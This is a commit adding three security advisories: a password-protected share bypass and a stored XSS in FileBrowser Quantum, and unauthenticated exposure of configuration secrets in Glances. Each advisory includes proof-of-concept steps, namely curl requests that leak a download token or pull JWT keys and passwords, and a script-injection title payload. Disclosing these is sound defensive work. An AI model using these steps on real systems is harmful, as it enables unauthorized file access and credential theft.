Publish Advisories

advisory-database[bot] · advisory-database[bot] · commit 33d03687b961 · 2026-03-09T19:50:35.000Z
GHSA-525j-95gf-766f GHSA-gh4x-f7cq-wwx6 GHSA-r633-fcgp-m532
diff --git a/advisories/github-reviewed/2026/03/GHSA-525j-95gf-766f/GHSA-525j-95gf-766f.json b/advisories/github-reviewed/2026/03/GHSA-525j-95gf-766f/GHSA-525j-95gf-766f.json
@@ -0,0 +1,67 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-525j-95gf-766f",
+  "modified": "2026-03-09T19:48:12Z",
+  "published": "2026-03-09T19:48:12Z",
+  "aliases": [
+    "CVE-2026-30933"
+  ],
+  "summary": "FileBrowser Quantum: Password-Protected Share Bypass via /public/api/share/info",
+  "details": "### Summary\nThe remediation for CVE-2026-27611 appears incomplete.  Password protected shares still disclose tokenized downloadURL via /public/api/share/info in docker image gtstef/filebrowser:1.3.1-webdav-2.  \n\n\n### Details\nThe issue stems from two flaws:\n1. Tokenized download URLs are written into the persistent share model\n```\nbackend/http/share.go\nconvertToFrontendShareResponse(line 63)\ns.DownloadURL = getShareURL(r, s.Hash, true, s.Token)\n```\n2. The public endpoint:\n```\nGET /public/api/share/info\nreturns shareLink.CommonShare without clearing DownloadURL.\n```\n\nSince Token is set for password-protected shares, and getShareURL(..., true, token) embeds it as a query parameter, the public API discloses a valid bearer download capability.\n\nThe previous patch removed token generation in one handler but did not address the persisted DownloadURL values/Public reflection of existing DownloadURL\n\n\n### PoC\n1. Create a password protected share as an authenticated user \n\n2. Copy the public share URL (the clipboard WITHOUT an arrow)  \n    `http://yourdomain/public/share/yoursharedhash`  \n    Example:   \n    `http://yourdomain/public/share/2EBGbXgXg5dpw-nK0RG6vw`  \n\n3. Query the public share endpoint via curl request:  \n`curl 'http://yourdomain/public/api/share/info?hash=(your-share-hash)' -H 'Accept: */*'  `  \nExample:  \n`curl 'http://yourdomain/public/api/share/info?hash=2EBGbXgXg5dpw-nK0RG6vw' -H 'Accept: */*'  `  \n  \n    Response includes:\n    ```\n    {\n        \"shareTheme\": \"default\",\n        \"title\": \"Shared files - test.md\",\n        \"description\": \"A share has been sent to you to view or download.\",\n        \"disableSidebar\": false,\n        \"downloadURL\": \"http://yourdomain/public/api/resources/download?hash=2EBGbXgXg5dpw-nK0RG6vw\\u0026token=EGGYjfyMgqlqknDAIjXekI3DXJ40Nxht.5-q3gnZVbeJ1KYTc-gLb04N6smp-AH2-d4AUFLXgQ6I%3D\",\n        \"shareURL\": \"http://yourdomain/public/share/2EBGbXgXg5dpw-nK0RG6vw\",\n        \"enforceDarkLightMode\": \"default\",\n        \"viewMode\": \"normal\",\n        \"shareType\": \"normal\",\n        \"sidebarLinks\": [\n            {\n                \"name\": \"Share QR Code and Info\",\n                \"category\": \"shareInfo\",\n                \"target\": \"#\",\n                \"icon\": \"qr_code\"\n            },\n            {\n                \"name\": \"Download\",\n                \"category\": \"download\",\n                \"target\": \"#\",\n                \"icon\": \"download\"\n            },\n            {\n                \"name\": \"sourceLocation\",\n                \"category\": \"custom\",\n                \"target\": \"/srv/test.md\",\n                \"icon\": \"\"\n            }\n        ],\n        \"hasPassword\": true,\n        \"disableLoginOption\": false,\n        \"sourceURL\": \"/srv/test.md\"\n    }\n    ```\nNote the response \"hasPassword\": true and downloadURL includes token= parameter\n\n\n4. Take the downloadURL(seen in json data response) and replace \\u0026 with & and paste link into Incognito or private browser to ensure cookies are not interfering  \nExample:\n`http://yourdomain/public/api/resources/download?hash=2EBGbXgXg5dpw-nK0RG6vw&token=EGGYjfyMgqlqknDAIjXekI3DXJ40Nxht.5-q3gnZVbeJ1KYTc-gLb04N6smp-AH2-d4AUFLXgQ6I%3D`\n\nBrowser downloads file immediately without requiring password\n\n### Impact \nAn unauthenticated attacker can retrieve password protected shared files without the password.\nResults in authentication bypass, unauthorized file access and confidentiality compromise\n\n### Recommended Remediation\nSanitize DownloadURL in public share info responses via `commonShare.DownloadURL = \"\"` before returning the json response in shareInfoHandler method located in backend/share.go\n\nStructural fix, only generate tokenized URLs after successful password validation",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/gtsteffaniak/filebrowser/backend"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "0.0.0-20260307130210-09713b32a5f6"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/gtsteffaniak/filebrowser/security/advisories/GHSA-525j-95gf-766f"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/gtsteffaniak/filebrowser"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/gtsteffaniak/filebrowser/releases/tag/v1.2.2-stable"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/gtsteffaniak/filebrowser/releases/tag/v1.3.1-beta"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-200",
+      "CWE-306",
+      "CWE-602"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-09T19:48:12Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2026/03/GHSA-gh4x-f7cq-wwx6/GHSA-gh4x-f7cq-wwx6.json b/advisories/github-reviewed/2026/03/GHSA-gh4x-f7cq-wwx6/GHSA-gh4x-f7cq-wwx6.json
@@ -0,0 +1,65 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-gh4x-f7cq-wwx6",
+  "modified": "2026-03-09T19:50:00Z",
+  "published": "2026-03-09T19:50:00Z",
+  "aliases": [
+    "CVE-2026-30928"
+  ],
+  "summary": "Glances Exposes Unauthenticated Configuration Secrets",
+  "details": "### Summary\nThe /api/4/config REST API endpoint returns the entire parsed Glances configuration file (glances.conf) via self.config.as_dict() with no filtering of sensitive values. The configuration file contains credentials for all configured backend services including database passwords, API tokens, JWT signing keys, and SSL key passwords.\n\n### Details\nRoot Cause: The as_dict() method in config.py iterates over every section and every key in the ConfigParser and returns them all as a flat dictionary. No sensitive key filtering or redaction is applied.\n\nAffected Code:\n- _File: glances/outputs/glances_restful_api.py, lines 1154-1167_\n```\ndef _api_config(self):\n    \"\"\"Glances API RESTful implementation.\n\n    Return the JSON representation of the Glances configuration file\n    HTTP/200 if OK\n    HTTP/404 if others error\n    \"\"\"\n    try:\n        # Get the RAW value of the config' dict\n        args_json = self.config.as_dict()  # <-- Returns ALL config including secrets\n    except Exception as e:\n        raise HTTPException(status.HTTP_404_NOT_FOUND, f\"Cannot get config ({str(e)})\")\n    else:\n        return GlancesJSONResponse(args_json)\n```\n\n- _File: glances/config.py, lines 280-287_\n```\ndef as_dict(self):\n    \"\"\"Return the configuration as a dict\"\"\"\n    dictionary = {}\n    for section in self.parser.sections():\n        dictionary[section] = {}\n        for option in self.parser.options(section):\n            dictionary[section][option] = self.parser.get(section, option)  # No filtering\n    return dictionary\n```\n- _File: glances/outputs/glances_restful_api.py, lines 472-475 (authentication bypass)_\n```\nif self.args.password:\n    router = APIRouter(prefix=self.url_prefix, dependencies=[Depends(self.authentication)])\nelse:\n    router = APIRouter(prefix=self.url_prefix)  # No authentication!\n```\n### PoC\n- Start Glances in default webserver mode:\n```\nglances -w\n# Glances web server started on http://0.0.0.0:61208/\n```\n- From any network-reachable host, retrieve all configuration secrets:\n```\n# Get entire config including all credentials\ncurl http://target:61208/api/4/config\n```\nStep 3: Extract specific secrets:\n```\n# Get JWT secret key for token forgery\ncurl http://target:61208/api/4/config/outputs/jwt_secret_key\n\n# Get InfluxDB token\ncurl http://target:61208/api/4/config/influxdb2/token\n\n# Get all stored server passwords\ncurl http://target:61208/api/4/config/passwords\n```\n### Impact\nFull Infrastructure Compromise: Database credentials (InfluxDB, MongoDB, PostgreSQL/TimescaleDB, CouchDB, Cassandra) allow direct access to all connected backend data stores.",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "glances"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "4.5.1"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/nicolargo/glances/security/advisories/GHSA-gh4x-f7cq-wwx6"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/nicolargo/glances/commit/306a7136154ba5c1531489c99f8306d84eae37da"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/nicolargo/glances"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/nicolargo/glances/releases/tag/v4.5.1"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-200"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-09T19:50:00Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2026/03/GHSA-r633-fcgp-m532/GHSA-r633-fcgp-m532.json b/advisories/github-reviewed/2026/03/GHSA-r633-fcgp-m532/GHSA-r633-fcgp-m532.json
@@ -0,0 +1,65 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-r633-fcgp-m532",
+  "modified": "2026-03-09T19:48:15Z",
+  "published": "2026-03-09T19:48:15Z",
+  "aliases": [
+    "CVE-2026-30934"
+  ],
+  "summary": "FileBrowser Quantum: Stored XSS in public share page via unsanitized share metadata (text/template misuse)",
+  "details": "## Summary\nStored XSS is possible via share metadata fields (e.g., `title`, `description`) that are rendered into HTML for `/public/share/<hash>` without context-aware escaping. The server uses `text/template` instead of `html/template`, allowing injected scripts to execute when victims visit the share URL.\n\n## Details\nThe server renders `public/index.html` using `text/template` and injects user-controlled share fields (title/description/etc.) into HTML contexts. `text/template` does not perform HTML contextual escaping like `html/template`. Because share metadata is persistent, the payload becomes stored and executes whenever a victim opens the affected share page.\n\nRelevant code paths:\n- `backend/http/static.go` (template rendering and share metadata assignment)\n- `backend/http/httpRouter.go` (template initialization)\n- `frontend/public/index.html` (insertion points for title/description and related fields)\n\n## PoC\n1. Login as a user with share creation permission.\n2. Create a share (`POST /api/share`) with malicious metadata:\n   - `title = </title><script>alert(\"xss\")</script><title>`\n3. Open the resulting `/public/share/<hash>` URL in a browser.\n4. **Expected:** Payload is safely escaped and displayed as text.\n5. **Actual:** JavaScript executes in victim's browser (stored XSS).\n\nTested on Docker image: `gtstef/filebrowser:stable` (version `v1.2.1-stable`).\n\n## Impact\n- Arbitrary script execution in application origin.\n- Potential account/session compromise, CSRF-like action execution, data exfiltration from authenticated contexts.\n- Affects anyone (including unauthenticated visitors) opening the malicious share URL.\n- The XSS is stored and persistent — no social engineering beyond sharing the link is required.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/gtsteffaniak/filebrowser"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "0.0.0-20260307130210-09713b32a5f6"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/gtsteffaniak/filebrowser/security/advisories/GHSA-r633-fcgp-m532"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/gtsteffaniak/filebrowser"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/gtsteffaniak/filebrowser/releases/tag/v1.2.2-stable"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/gtsteffaniak/filebrowser/releases/tag/v1.3.1-beta"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-79"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-09T19:48:15Z",
+    "nvd_published_at": null
+  }
+}
